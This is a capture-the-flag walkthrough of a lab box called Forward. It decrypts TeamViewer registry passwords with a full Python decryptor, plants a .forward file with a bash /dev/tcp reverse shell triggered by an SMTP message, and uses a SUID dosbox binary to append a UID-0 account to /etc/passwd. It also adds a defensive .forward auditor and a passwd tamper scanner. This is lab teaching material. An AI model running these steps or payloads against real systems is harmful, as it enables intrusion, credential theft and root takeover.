Forward - OSPG


Summary of Result

In this writeup, we decrypt TeamViewer passwords from registry exports found on an anonymous SMB share and use one of them to reach the home directory of the user fox over SMB. We then abuse the .forward file to have the mail server execute a command of our choice and obtain initial access. Local enumeration exposes a SUID dosbox binary, which we use to overwrite /etc/passwd and gain root.


Enumeration

Nmap

We’ll begin with an nmap scan of all TCP ports:

$ sudo nmap -sV -p- --open -oA nmap/services -Pn 192.168.185.157
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp  open  smtp        Exim smtpd
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
  • There are a few services running on the target system. We will go through them one by one.

SMB Enumeration

Let’s first list the available shares.

$ smbmap -H $IP
[+] IP: 192.168.112.157:445     Name: 192.168.112.157                                   
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        utils                                                   READ ONLY       Utilities
        print$                                                  NO ACCESS       Printer Drivers
        IPC$                                                    NO ACCESS       IPC Service (Samba 4.9.5-Debian)

From the result, utils is the only share we can access anonymously.

To open an interactive SMB session on the utils share, we can execute the following command:

$ smbclient \\\\192.168.185.157\\utils -U 'anonymous'
Enter WORKGROUP\anonymous's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Dec 18 19:26:48 2020
  ..                                  D        0  Fri Dec 18 18:48:44 2020
  fox.reg                             N    10634  Fri Dec 18 18:48:44 2020
  TeamViewer_Setup_v7.exe             N  5024832  Fri Dec 18 18:48:44 2020
  mara.reg                            N    10408  Fri Dec 18 18:48:44 2020
  vale.reg                            N    10206  Fri Dec 18 18:48:44 2020
  golemitratigunda.reg                N    10206  Fri Dec 18 18:48:44 2020
  alberobello.reg                     N    10206  Fri Dec 18 18:48:44 2020
  giammy.reg                          N    10312  Fri Dec 18 18:48:44 2020
  README.all                          N      165  Fri Dec 18 18:53:55 2020

                14384136 blocks of size 1024. 11597116 blocks available

The files with the .reg extension are Windows registry exports, which makes them the most interesting ones here.

To investigate them properly, let’s download everything to our own machine. In the SMB shell, execute the following:

smb: \> mget *
# → If prompted, we type "y" or "yes" to permit the downloading process. 

Once everything is downloaded, we can inspect the files one at a time.

Let’s begin with the README.all file.

$ cat README.all 
each of you has to install TeamViewer and then import your own registry key for automatic configuration.
Don't worry about the password, it's well encrypted!

Root!

The “registry key” refers to the .reg files, so the encrypted passwords should be inside them. Note that regedit exports .reg files as UTF-16LE with CRLF line endings, so cat, grep and most scripts on Linux will not read them cleanly; we convert them to UTF-8 first.

This can be done with the dos2unix utility.

$ dos2unix *.reg 
dos2unix: converting UTF-16LE file ... to UTF-8 Unix format...
$ file mara.reg 
mara.reg: ASCII text

Now, we try to read one of them.

$ cat mara.reg
[...]
"SecurityPasswordAES"=hex:88,9d,f1,f5,80,27,74,a5,d2,45,be,78,b1,7e,56,a0,1f,\
  16,12,86,64,88,3e,73,b9,02,5e,7b,78,2e,0f,7e,b0,61,f1,69,7b,a9,aa,46,41,f1,\
  cc,27,51,97,73,e7,4e,58,e5,f2,08,ab,b6,4a,8e,e1,b0,f6,e4,77,02,78
[...]

The SecurityPasswordAES value holds the encrypted password we are after.

A bit of research shows that TeamViewer 7 encrypts stored passwords with AES-128-CBC under a key and IV that are hardcoded in the binary and therefore identical on every installation (CVE-2019-18988). Such a ciphertext can be decrypted with the .py script from whynotsecurity.

$ python3 teamviewer_password_decrypt.py 
This is a quick and dirty Teamviewer password decrypter basis wonderful post by @whynotsecurity.
Read this blogpost if you haven't already : https://whynotsecurity.com/blog/teamviewer
 
[...]

Enter output from registry without spaces : 2c0fff76ca03d7c21c0d3c8b55edd8de37f89720ae6ed382d0ad2e70f97effea0b0c1cd901cbd1ad90fc601b9e40fc9c4baf65eec51962eb4edacc7c30a8a66b0cbd9f362ac0cad1598904aecb8b9610
Decrypted password is :  iparalipomenidellabatracomiomachia
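To make the two manual steps above reproducible, here is an added Python example (mine, not the page’s and not the whynotsecurity script) that parses the SecurityPasswordAES value straight out of a .reg export and decrypts it. It handles the UTF-16LE/CRLF encoding of regedit exports itself, so dos2unix is not needed, and joins the backslash-continued hex lines. The key and IV are the static ones published in the whynotsecurity post, not values taken from this page, so check them against that post; the decryption step needs pycryptodome or cryptography installed. The embedded .reg fragment is constructed from the mara.reg excerpt shown above, with a placeholder key path.

```python
import re
import sys
from pathlib import Path

# Static AES-128-CBC key and IV shared by every TeamViewer install
# (taken from the whynotsecurity post cited above; verify against it).
TV_KEY = bytes.fromhex("0602000000a400005253413100040000")
TV_IV = bytes.fromhex("0100010067244F436E6762F25EA8D704")


def decode_reg(raw: bytes) -> str:
    """Turn an exported .reg file into text. regedit writes UTF-16LE with a
    BOM and CRLF endings; hand-written exports may be plain ANSI."""
    if raw.startswith(b"\xff\xfe"):
        text = raw.decode("utf-16-le").lstrip("\ufeff")
    else:
        text = raw.decode("latin-1")
    return text.replace("\r\n", "\n")


def parse_reg_hex(text: str, name: str) -> bytes:
    """Return the bytes of the REG_BINARY value `name`, written as
    "name"=hex:aa,bb,\ and continued on indented lines ending in a backslash."""
    head = re.compile(r'^"%s"=hex(?:\(\d+\))?:(.*)$' % re.escape(name))
    lines = text.split("\n")
    i = 0
    while i < len(lines):
        m = head.match(lines[i].strip())
        if m:
            body = m.group(1).strip()
            while body.endswith("\\"):          # a continuation line follows
                i += 1
                body = body[:-1] + lines[i].strip()
            return bytes.fromhex(body.replace(",", ""))
        i += 1
    raise KeyError(f"{name} not found in .reg data")


def decrypt_teamviewer(ciphertext: bytes) -> str:
    """AES-128-CBC decrypt with the static key/IV. TeamViewer stores the
    password as UTF-16LE, zero-padded up to the block size."""
    if not ciphertext or len(ciphertext) % 16:
        raise ValueError("ciphertext length must be a non-zero multiple of 16")
    try:
        from Crypto.Cipher import AES            # pycryptodome
        plain = AES.new(TV_KEY, AES.MODE_CBC, TV_IV).decrypt(ciphertext)
    except ImportError:                          # fall back to python-cryptography
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        dec = Cipher(algorithms.AES(TV_KEY), modes.CBC(TV_IV)).decryptor()
        plain = dec.update(ciphertext) + dec.finalize()
    return plain.decode("utf-16-le", errors="replace").rstrip("\x00")


def recover_from_file(path: Path) -> str:
    return decrypt_teamviewer(parse_reg_hex(decode_reg(path.read_bytes()), "SecurityPasswordAES"))


# Constructed sample: the SecurityPasswordAES value quoted from mara.reg above,
# re-encoded the way regedit exports it. The key path is a placeholder.
SAMPLE_REG = (
    "\ufeffWindows Registry Editor Version 5.00\r\n\r\n"
    "[HKEY_LOCAL_MACHINE\\SOFTWARE\\TeamViewer\\Version7]\r\n"
    '"SecurityPasswordAES"=hex:88,9d,f1,f5,80,27,74,a5,d2,45,be,78,b1,7e,56,a0,1f,\\\r\n'
    "  16,12,86,64,88,3e,73,b9,02,5e,7b,78,2e,0f,7e,b0,61,f1,69,7b,a9,aa,46,41,f1,\\\r\n"
    "  cc,27,51,97,73,e7,4e,58,e5,f2,08,ab,b6,4a,8e,e1,b0,f6,e4,77,02,78\r\n"
).encode("utf-16-le")


if __name__ == "__main__":
    # usage: python3 tv_reg_decrypt.py fox.reg mara.reg ...
    for arg in sys.argv[1:]:
        try:
            print(f"{arg}: {recover_from_file(Path(arg))}")
        except (KeyError, ValueError, ImportError) as exc:
            print(f"{arg}: {exc}", file=sys.stderr)
```

Running it over the downloaded exports gives the same list of passwords as feeding each hex string to the original script by hand. The length check in decrypt_teamviewer matters in practice: a truncated or mis-joined hex line otherwise produces garbage rather than an error.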

Decrypting the rest of them in the same way yields the following passwords:

iparalipomenidellabatracomiomachia
alberobello
hackmeifyoureable
cocomerirossi
bangladesh
paralipomenibatracomiomachia

The usernames come from the .reg file names (fox, mara, vale, golemitratigunda, alberobello, giammy). Trying each username/password combination against SSH and SMB, fox with iparalipomenidellabatracomiomachia authenticates to SMB and exposes an additional share: fox.

$ smbmap -H 192.168.117.157 -u fox -p iparalipomenidellabatracomiomachia
[+] IP: 192.168.117.157:445     Name: 192.168.117.157                                   
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        utils                                                   READ ONLY       Utilities
        print$                                                  READ ONLY       Printer Drivers
        IPC$                                                    NO ACCESS       IPC Service (Samba 4.9.5-Debian)
        fox                                                     READ, WRITE     Home Directories

Once again, we connect to the fox share with smbclient.

$ smbclient \\\\192.168.185.157\\fox -U fox
Enter WORKGROUP\fox's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Aug 24 08:43:00 2021
  ..                                  D        0  Sat Jan  9 05:04:11 2021
  .bashrc                             H     3526  Fri Dec 18 18:48:44 2020
  .Xauthority                         H       53  Tue Aug 10 07:55:45 2021
  .bash_history                       H        0  Tue Aug 24 05:08:55 2021
  .profile                            H      807  Fri Dec 18 18:48:44 2020
  local.txt                           N       33  Tue Aug 24 08:27:52 2021
  .dosbox                            DH        0  Tue Aug 10 07:55:54 2021
  .bash_logout                        H      220  Fri Dec 18 18:48:44 2020
  .gnupg                             DH        0  Tue Aug 10 07:40:39 2021
  .forward                           AH        1  Fri Aug 20 03:17:16 2021

                14384136 blocks of size 1024. 11597116 blocks available

Just like that, we have read/write access to fox’s home directory.


Exploitation

Having read/write access to fox’s home directory over SMB, the .forward file is the interesting target: Exim reads it when delivering mail to fox, and it can instruct the MTA to run a command of our choice.


The .forward file

Let’s explain the .forward file a bit more.

A .forward file is a per-user delivery instruction that the MTA (here Exim) consults each time a message arrives for that user. It does not reply to mail; it redirects it. Each entry is a destination: another local user or remote address, a file to append the message to, or, in the form "|command", a program that receives the message on stdin and is run as the mailbox owner. It lives at ~/.forward and follows the structure below.

<who_to_forward>(i.e root, admin@example.com)
"|<code_to_execute>"

Notice that the double quotes ("") and the pipe (|) are required for a command entry. Whether pipe entries are honoured at all depends on the MTA configuration: in Exim the redirect router that reads .forward must have a pipe_transport and must not set forbid_pipe (the fact that this attack works shows the Debian install here allows it), and Exim also ignores the file when its owner is not the user or it is group/world-writable.

So when an email is delivered to a user who has such a .forward in their home directory, the command is executed as that user.
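As an added example, not part of the original writeup: a small Python auditor for the mechanism just described. It parses a .forward file into its entry types (address, file, :include:, pipe) the way a redirect router would, flags pipe commands, and checks the two properties Exim itself cares about before trusting the file, its mode and its ownership. parse_forward and audit_forward work on strings so they can be tested offline; scan_homes applies them to every home directory on a live box. The sample .forward text is constructed (it mirrors the payload shape used further down) and the quoting rules implemented are mine, covering the common forms rather than every corner of Exim’s redirect syntax.

```python
import stat
from pathlib import Path
from typing import List, Tuple


def _split_entries(line: str) -> List[str]:
    """Split one .forward line on commas, keeping a double-quoted item (which
    may contain commas, spaces and shell syntax) as a single entry."""
    entries, cur, quoted = [], "", False
    for ch in line:
        if ch == '"':
            quoted = not quoted
            cur += ch
        elif ch == "," and not quoted:
            entries.append(cur.strip())
            cur = ""
        else:
            cur += ch
    entries.append(cur.strip())
    return [e for e in entries if e]


def parse_forward(text: str) -> List[Tuple[str, str]]:
    """Classify .forward entries as ('pipe', cmd), ('file', path),
    ('include', path) or ('address', target). Lines starting with '#' are comments."""
    out = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for entry in _split_entries(line):
            quoted = len(entry) >= 2 and entry[0] == entry[-1] == '"'
            val = entry[1:-1] if quoted else entry
            if val.startswith("|"):
                out.append(("pipe", val[1:].strip()))
            elif val.startswith(":include:"):
                out.append(("include", val[len(":include:"):]))
            elif val.startswith("/"):
                out.append(("file", val))
            else:
                out.append(("address", val))
    return out


def audit_forward(text: str, mode: int, owner_uid: int, home_uid: int) -> List[str]:
    """Findings for one .forward: pipe deliveries (code execution as the mailbox
    owner) plus the ownership/mode conditions Exim checks before trusting the file."""
    findings = [f"pipe delivery: {cmd}" for kind, cmd in parse_forward(text) if kind == "pipe"]
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("group/world-writable (mode %o)" % (mode & 0o777))
    if owner_uid != home_uid:
        findings.append(f"owned by uid {owner_uid}, home owned by uid {home_uid}")
    return findings


def scan_homes(root: str = "/home") -> List[Tuple[str, List[str]]]:
    """Audit the .forward of every home directory under `root` (live-system use)."""
    results = []
    for home in sorted(Path(root).iterdir()):
        fw = home / ".forward"
        if not fw.is_file():
            continue
        st = fw.stat()
        findings = audit_forward(fw.read_text(errors="replace"), st.st_mode,
                                 st.st_uid, home.stat().st_uid)
        if findings:
            results.append((str(fw), findings))
    return results


# Constructed sample: forward a copy to root and run a reverse shell.
SAMPLE_FORWARD = (
    "root\n"
    "\"|/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.49.185/22 0>&1'\"\n"
)

if __name__ == "__main__":
    for path, findings in scan_homes():
        print(path)
        for finding in findings:
            print("  -", finding)
```

On a host where users legitimately forward mail, the interesting signal is a pipe entry appearing in a .forward that was written by a process other than the user’s shell or mail client, for example via an SMB share exposing the home directory as it is here.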

With that in mind, let’s craft a .forward that spawns a reverse shell and upload it to fox’s home directory.

$ cat .forward 
root
"|/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.49.185/22 0>&1'"
$ smbclient \\\\192.168.185.157\\fox -U fox
Enter WORKGROUP\fox's password: 
Try "help" to get a list of possible commands.
smb: \> put .forward
putting file .forward as \.forward (0.1 kb/s) (average 0.1 kb/s)
smb: \> ls
  .                                   D        0  Fri Aug 20 03:17:16 2021
  ..                                  D        0  Sat Jan  9 05:04:11 2021
  .bashrc                             H     3526  Fri Dec 18 18:48:44 2020
  .Xauthority                         H       53  Tue Aug 10 07:55:45 2021
  .bash_history                       H        0  Tue Aug 24 05:08:55 2021
  .profile                            H      807  Fri Dec 18 18:48:44 2020
  local.txt                           N       33  Tue Aug 24 09:04:02 2021
  .dosbox                            DH        0  Tue Aug 10 07:55:54 2021
  .bash_logout                        H      220  Fri Dec 18 18:48:44 2020
  .gnupg                             DH        0  Tue Aug 10 07:40:39 2021
  .forward                           AH       71  Tue Aug 24 09:05:45 2021

                14384136 blocks of size 1024. 11597108 blocks available

Once .forward is in place, we trigger the command by sending an email to the user fox.

$ telnet 192.168.185.157 25
Trying 192.168.185.157...
Connected to 192.168.185.157.
Escape character is '^]'.
220 forward ESMTP Exim 4.92 Mon, 23 Aug 2021 19:05:33 -0400
EHLO forward
250-forward Hello forward [192.168.49.185]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-CHUNKING
250-PRDR
250 HELP
mail from: jay@jayngng.github.io
250 OK
rcpt to: fox@forward
250 Accepted
data
354 Enter message, ending with "." on a line by itself
BoOM!!   

Thanks,
Jay
.

A few seconds later, our nc listener on port 22 receives a shell as fox.

$ sudo nc -nlvp 22
Listening on 0.0.0.0 22
Connection received on 192.168.185.157 60456
bash: cannot set terminal process group (898): Inappropriate ioctl for device
bash: no job control in this shell
fox@forward:~$ id    
id
uid=1000(fox) gid=100(users) groups=100(users)

Privilege Escalation


fox Plain-text Password

There are other users on the system, so let’s check whichever .bash_history files we can read for anything interesting.

fox@forward:~$ find /home/* -name .bash_history -size +0 -exec cat {} \; 2>/dev/null                                                                                                                               
sshh mara@192.168.0.191
CIARLARIELLOkj99
ssh mara@192.168.0.191

We quickly obtain an interesting string, CIARLARIELLOkj99, which looks like mara’s password given the ssh commands around it. Trying it against the different users, however, shows that it is fox’s own password. We can now SSH in as fox with it, which gives us a proper terminal.

SUID binary

Let’s enumerate SUID binaries.

fox@forward:~$ find / -perm -u=s -ls 2>/dev/null
[...]
   283136   2612 -rwsr-sr-x   1 root     root        2671432 Jul  8  2019 /usr/bin/dosbox
[...]

The dosbox binary is the one to investigate; note that it is both SUID and SGID root. DOSBox is an x86 PC emulator for running DOS programs, mostly old games, on Linux. It needs a graphical display, so it will not start from a plain SSH session; forwarding X11 with the -X switch of ssh solves that.

The commands are as follows:

$ ssh fox@192.168.185.157 -X
$ dosbox # -> launch dosbox. 

After a few seconds, a DOSBox console pops up. Playing with it for a while, we find that its MOUNT command maps a directory of the host filesystem to a DOS drive letter.

Let’s summarise what we have so far.

→ dosbox is SUID root, so every file operation performed inside the DOSBox console runs with root privileges.

→ The DOSBox console can mount directories of the target filesystem as drives.

→ As a result, we can write a new root entry into /etc/passwd.

The steps to reproduce the attack are as follows:

  • On the DOSBOX console, execute.
    Z:\> mount e /etc # → Mount /etc directory to E: drive of the DOSBOX
    Z:\> mount f /home/fox # → Mount /home/fox directory to F: drive of the DOSBOX
    
  • On the fox terminal, execute.
    fox@forward:~$ cp /etc/passwd .  # → Copy /etc/passwd to fox's home directory, which DOSBox sees as F:
    fox@forward:~$ echo 'jay:$1$letmein1$WSOs/feh/fhyU4QWmT0aG1:0:0::/root:/bin/bash' >> passwd # → Append a user jay with UID 0, GID 0 and an MD5-crypt ($1$) hash in the password field
    
  • To overwrite the passwd file, on the previous DOSBOX console, continue executing:
    Z:\> E: # → Change from drive Z to drive E
    E:\> copy f:\passwd passwd # → Copy /home/fox/passwd to /etc/passwd
    

After these commands, /etc/passwd contains a new entry for jay with UID 0 and GID 0, i.e. a second root account. Because the second field holds a hash instead of x, the system authenticates against it directly and never consults /etc/shadow.

fox@forward:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
[...]
jay:$1$letmein1$WSOs/feh/fhyU4QWmT0aG1:0:0::/root:/bin/bash
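The appended line works for two reasons: UID 0 in the third field is what makes an account root, whatever its name, and a hash in the second field instead of x is the pre-shadow layout that login and su still honour, so /etc/shadow is never consulted. The following Python is an added example, mine rather than the author’s: it generates such an entry with a pure-Python MD5-crypt ($1$) implementation, the scheme the $1$letmein1$ hash uses, and on the defensive side scans a passwd file for exactly this kind of tampering. The passwd text it scans is constructed and includes the author’s jay line; with the password admin123 and salt letmein1 given on the page it should reproduce that hash.

```python
import hashlib
from typing import List, Tuple

_ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(v: int, n: int) -> str:
    """crypt(3)'s 6-bit encoding, least significant group first."""
    out = ""
    for _ in range(n):
        out += _ITOA64[v & 0x3F]
        v >>= 6
    return out


def md5crypt(password: str, salt: str) -> str:
    """MD5-crypt ($1$) as implemented in FreeBSD/glibc crypt(3), the scheme
    `openssl passwd -1` produces. The salt is at most 8 characters."""
    pw, sl = password.encode(), salt.encode()[:8]
    ctx = hashlib.md5(pw + b"$1$" + sl)
    alt = hashlib.md5(pw + sl + pw).digest()
    n = len(pw)
    while n > 0:                       # one chunk of alt per 16 bytes of password
        ctx.update(alt[: min(16, n)])
        n -= 16
    n = len(pw)
    while n:                           # the bit-by-bit quirk of the original
        ctx.update(b"\0" if n & 1 else pw[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):              # fixed 1000-round stretching
        c = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            c.update(sl)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    out = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                  for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)))
    return "$1$" + sl.decode() + "$" + out + _to64(final[11], 2)


def make_passwd_entry(user: str, password: str, salt: str, uid: int = 0, gid: int = 0,
                      home: str = "/root", shell: str = "/bin/bash") -> str:
    """Build a pre-shadow style passwd line: a hash in field 2 means login
    authenticates against it directly and /etc/shadow is never consulted."""
    for field in (user, salt, home, shell):
        if ":" in field or "\n" in field:
            raise ValueError("passwd fields must not contain ':' or newlines")
    return f"{user}:{md5crypt(password, salt)}:{uid}:{gid}::{home}:{shell}"


def find_suspicious_entries(passwd_text: str) -> List[Tuple[int, str, str]]:
    """Defender-side check for this abuse: extra UID-0 accounts, empty password
    fields, and hashes stored in /etc/passwd instead of /etc/shadow."""
    findings = []
    for lineno, line in enumerate(passwd_text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, fields[0], f"malformed entry with {len(fields)} fields"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append((lineno, name, "UID 0 account other than root"))
        if pw == "":
            findings.append((lineno, name, "empty password field"))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            findings.append((lineno, name, "password hash stored in passwd (bypasses shadow)"))
    return findings


# Constructed /etc/passwd excerpt: stock entries plus the line appended above.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fox:x:1000:100::/home/fox:/bin/bash
jay:$1$letmein1$WSOs/feh/fhyU4QWmT0aG1:0:0::/root:/bin/bash
"""

if __name__ == "__main__":
    print(make_passwd_entry("jay", "admin123", "letmein1"))
    for lineno, name, why in find_suspicious_entries(SAMPLE_PASSWD):
        print(f"line {lineno}: {name}: {why}")
```

From the incident-response side, the same two checks (UID 0 under a name other than root, and any non-x second field) are cheap to run across a fleet and catch this technique regardless of which SUID binary did the writing.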

We can now su to jay with the password behind that hash.

fox@forward:~$ su jay 
Password: # → password is admin123 
root@forward:/home/fox# id
uid=0(root) gid=0(root) groups=0(root)

and we are root.